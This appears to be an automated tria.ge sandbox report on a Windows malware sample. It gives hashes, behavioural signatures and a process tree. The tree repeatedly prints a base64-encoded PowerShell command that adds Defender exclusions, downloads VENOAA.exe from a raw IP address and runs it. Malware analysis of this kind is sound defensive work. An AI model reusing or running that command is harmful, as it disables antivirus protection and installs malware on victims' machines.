Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
01/05/2024, 16:11
Static task
static1
Behavioral task
behavioral1
Sample
a79bbca37e4d87e9bd35a6d4f4730250.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
a79bbca37e4d87e9bd35a6d4f4730250.exe
Resource
win10v2004-20240419-en
General
-
Target
a79bbca37e4d87e9bd35a6d4f4730250.exe
-
Size
6KB
-
MD5
a79bbca37e4d87e9bd35a6d4f4730250
-
SHA1
38e7ddeb8f9e7fe8f56a9a43b012d6d5318f7e48
-
SHA256
3fcf13982c7b543af58f22f18d77b370f2871eec5f8be3838588189ec528afad
-
SHA512
fac3c4afeed70e78e3162576716c1055616353e109fcbdc06200239dc4c7d28762ef0ee40dac1d2faa1394903f36209c6f49e12a73533d7b733433401d01ab64
-
SSDEEP
96:20acCYDSB79X4b60qvjnMDOeI3VIJ5NwC7eAYz0evk+P/Zz44f3szd3ojZrl:2PYDk90qvjsI3mNwCnYPvk+ZPf8zde
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
flow pid Process 7 716 powershell.exe 15 2592 powershell.exe 16 3892 powershell.exe 20 2124 powershell.exe 25 3224 powershell.exe 27 8 powershell.exe 28 3032 powershell.exe 32 4884 powershell.exe 34 2292 powershell.exe 35 5028 powershell.exe 36 4988 powershell.exe 37 3152 powershell.exe 38 3608 powershell.exe 39 4208 powershell.exe 40 1624 powershell.exe 41 2096 powershell.exe 44 3988 powershell.exe 45 3392 powershell.exe 49 3080 powershell.exe 51 1948 powershell.exe 52 2116 powershell.exe 53 972 powershell.exe 54 2672 powershell.exe 56 3964 powershell.exe 57 364 powershell.exe 58 2592 powershell.exe 59 4960 powershell.exe 60 3220 powershell.exe 62 3256 powershell.exe 63 1852 powershell.exe 72 1264 powershell.exe 76 3964 powershell.exe 79 1856 powershell.exe 81 4868 powershell.exe 82 2496 powershell.exe 83 2852 powershell.exe 84 2484 powershell.exe 85 1588 powershell.exe 86 3640 powershell.exe 87 3040 powershell.exe 88 4548 powershell.exe 89 4828 powershell.exe 90 3080 powershell.exe 91 4192 powershell.exe 92 4200 powershell.exe 93 1040 powershell.exe 94 4308 powershell.exe 95 4656 powershell.exe 96 4040 powershell.exe 97 3520 powershell.exe 98 4516 powershell.exe 99 1680 powershell.exe 100 4828 powershell.exe 101 3380 powershell.exe 102 1684 powershell.exe 103 920 powershell.exe 104 4340 powershell.exe 106 1100 powershell.exe 107 3240 powershell.exe 110 4892 powershell.exe 112 4756 powershell.exe 113 3496 powershell.exe 114 1588 powershell.exe 119 2236 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation VENOAA.exe -
Executes dropped EXE 64 IoCs
pid Process 4544 VENOAA.exe 4340 VENOAA.exe 2800 VENOAA.exe 3200 VENOAA.exe 4648 VENOAA.exe 2288 VENOAA.exe 4444 VENOAA.exe 1788 VENOAA.exe 2848 VENOAA.exe 1608 VENOAA.exe 4516 VENOAA.exe 4932 VENOAA.exe 804 VENOAA.exe 4340 VENOAA.exe 3536 VENOAA.exe 4980 VENOAA.exe 4452 VENOAA.exe 896 VENOAA.exe 3956 VENOAA.exe 4008 VENOAA.exe 2192 VENOAA.exe 1852 VENOAA.exe 4736 VENOAA.exe 3200 VENOAA.exe 4912 VENOAA.exe 2588 VENOAA.exe 4620 VENOAA.exe 5028 VENOAA.exe 3172 VENOAA.exe 3012 VENOAA.exe 2552 VENOAA.exe 4040 VENOAA.exe 116 VENOAA.exe 3496 VENOAA.exe 4020 VENOAA.exe 1684 VENOAA.exe 4356 VENOAA.exe 1040 VENOAA.exe 432 VENOAA.exe 3564 VENOAA.exe 1496 VENOAA.exe 4736 VENOAA.exe 4800 VENOAA.exe 3496 VENOAA.exe 3256 VENOAA.exe 8 VENOAA.exe 3104 VENOAA.exe 4444 VENOAA.exe 3384 VENOAA.exe 2132 VENOAA.exe 3952 VENOAA.exe 4360 VENOAA.exe 3536 VENOAA.exe 2644 VENOAA.exe 1212 VENOAA.exe 3608 VENOAA.exe 4984 VENOAA.exe 3648 VENOAA.exe 4196 VENOAA.exe 2192 VENOAA.exe 3316 VENOAA.exe 1852 VENOAA.exe 3484 VENOAA.exe 1364 VENOAA.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 716 powershell.exe 716 powershell.exe 2592 powershell.exe 2592 powershell.exe 3892 powershell.exe 3892 powershell.exe 2124 powershell.exe 2124 powershell.exe 3224 powershell.exe 3224 powershell.exe 8 powershell.exe 8 powershell.exe 3032 powershell.exe 3032 powershell.exe 4884 powershell.exe 4884 powershell.exe 2292 powershell.exe 2292 powershell.exe 5028 powershell.exe 5028 powershell.exe 4988 powershell.exe 4988 powershell.exe 3152 powershell.exe 3152 powershell.exe 3608 powershell.exe 3608 powershell.exe 4208 powershell.exe 4208 powershell.exe 1624 powershell.exe 1624 powershell.exe 2096 powershell.exe 2096 powershell.exe 3988 powershell.exe 3988 powershell.exe 3392 powershell.exe 3392 powershell.exe 3080 powershell.exe 3080 powershell.exe 1948 powershell.exe 1948 powershell.exe 2116 powershell.exe 2116 powershell.exe 972 powershell.exe 972 powershell.exe 2672 powershell.exe 2672 powershell.exe 3172 powershell.exe 3172 powershell.exe 3964 powershell.exe 3964 powershell.exe 364 powershell.exe 364 powershell.exe 2592 powershell.exe 2592 powershell.exe 4960 powershell.exe 4960 powershell.exe 3220 powershell.exe 3220 powershell.exe 4932 powershell.exe 4932 powershell.exe 3256 powershell.exe 3256 powershell.exe 1852 powershell.exe 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 716 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 1948 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4040 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4588 wrote to memory of 716 4588 a79bbca37e4d87e9bd35a6d4f4730250.exe 84 PID 4588 wrote to memory of 716 4588 a79bbca37e4d87e9bd35a6d4f4730250.exe 84 PID 716 wrote to memory of 4544 716 powershell.exe 86 PID 716 wrote to memory of 4544 716 powershell.exe 86 PID 4544 wrote to memory of 2592 4544 VENOAA.exe 88 PID 4544 wrote to memory of 2592 4544 VENOAA.exe 88 PID 2592 wrote to memory of 4340 2592 powershell.exe 93 PID 2592 wrote to memory of 4340 2592 powershell.exe 93 PID 4340 wrote to memory of 3892 4340 VENOAA.exe 94 PID 4340 wrote to memory of 3892 4340 VENOAA.exe 94 PID 3892 wrote to memory of 2800 3892 powershell.exe 98 PID 3892 wrote to memory of 2800 3892 powershell.exe 98 PID 2800 wrote to memory of 2124 2800 VENOAA.exe 99 PID 2800 wrote to memory of 2124 2800 VENOAA.exe 99 PID 2124 wrote to memory of 3200 2124 powershell.exe 101 PID 2124 wrote to memory of 3200 2124 powershell.exe 101 PID 3200 wrote to memory of 3224 3200 VENOAA.exe 102 PID 3200 wrote to memory of 3224 3200 VENOAA.exe 102 PID 3224 wrote to memory of 4648 3224 powershell.exe 106 PID 3224 wrote to memory of 4648 3224 powershell.exe 106 PID 4648 wrote to memory of 8 4648 VENOAA.exe 107 PID 4648 wrote to memory of 8 4648 VENOAA.exe 107 PID 8 wrote to memory of 2288 8 powershell.exe 109 PID 8 wrote to memory of 2288 8 powershell.exe 109 PID 2288 wrote to memory of 3032 2288 VENOAA.exe 111 PID 2288 wrote to memory of 3032 2288 VENOAA.exe 111 PID 3032 wrote to memory of 4444 3032 powershell.exe 113 PID 3032 wrote to memory of 4444 3032 powershell.exe 113 PID 4444 wrote to memory of 4884 4444 VENOAA.exe 114 PID 4444 wrote to memory of 4884 4444 VENOAA.exe 114 PID 4884 wrote to memory of 1788 4884 powershell.exe 117 PID 4884 wrote to memory of 1788 4884 powershell.exe 117 PID 1788 wrote to memory of 2292 1788 VENOAA.exe 118 PID 1788 wrote to memory of 2292 1788 VENOAA.exe 118 PID 2292 wrote to memory of 2848 2292 powershell.exe 121 PID 2292 wrote to memory of 2848 2292 powershell.exe 121 PID 2848 wrote to memory of 5028 2848 VENOAA.exe 122 PID 2848 wrote to memory of 5028 2848 VENOAA.exe 122 PID 5028 wrote to memory of 1608 5028 powershell.exe 124 PID 5028 wrote to memory of 1608 5028 powershell.exe 124 PID 1608 wrote to memory of 4988 1608 VENOAA.exe 125 PID 1608 wrote to memory of 4988 1608 VENOAA.exe 125 PID 4988 wrote to memory of 4516 4988 powershell.exe 127 PID 4988 wrote to memory of 4516 4988 powershell.exe 127 PID 4516 wrote to memory of 3152 4516 VENOAA.exe 128 PID 4516 wrote to memory of 3152 4516 VENOAA.exe 128 PID 3152 wrote to memory of 4932 3152 powershell.exe 130 PID 3152 wrote to memory of 4932 3152 powershell.exe 130 PID 4932 wrote to memory of 3608 4932 VENOAA.exe 132 PID 4932 wrote to memory of 3608 4932 VENOAA.exe 132 PID 3608 wrote to memory of 804 3608 powershell.exe 134 PID 3608 wrote to memory of 804 3608 powershell.exe 134 PID 804 wrote to memory of 4208 804 VENOAA.exe 135 PID 804 wrote to memory of 4208 804 VENOAA.exe 135 PID 4208 wrote to memory of 4340 4208 powershell.exe 137 PID 4208 wrote to memory of 4340 4208 powershell.exe 137 PID 4340 wrote to memory of 1624 4340 VENOAA.exe 138 PID 4340 wrote to memory of 1624 4340 VENOAA.exe 138 PID 1624 wrote to memory of 3536 1624 powershell.exe 140 PID 1624 wrote to memory of 3536 1624 powershell.exe 140 PID 3536 wrote to memory of 2096 3536 VENOAA.exe 141 PID 3536 wrote to memory of 2096 3536 VENOAA.exe 141 PID 2096 wrote to memory of 4980 2096 powershell.exe 144 PID 2096 wrote to memory of 4980 2096 powershell.exe 144
Processes
-
C:\Users\Admin\AppData\Local\Temp\a79bbca37e4d87e9bd35a6d4f4730250.exe"C:\Users\Admin\AppData\Local\Temp\a79bbca37e4d87e9bd35a6d4f4730250.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2800 -
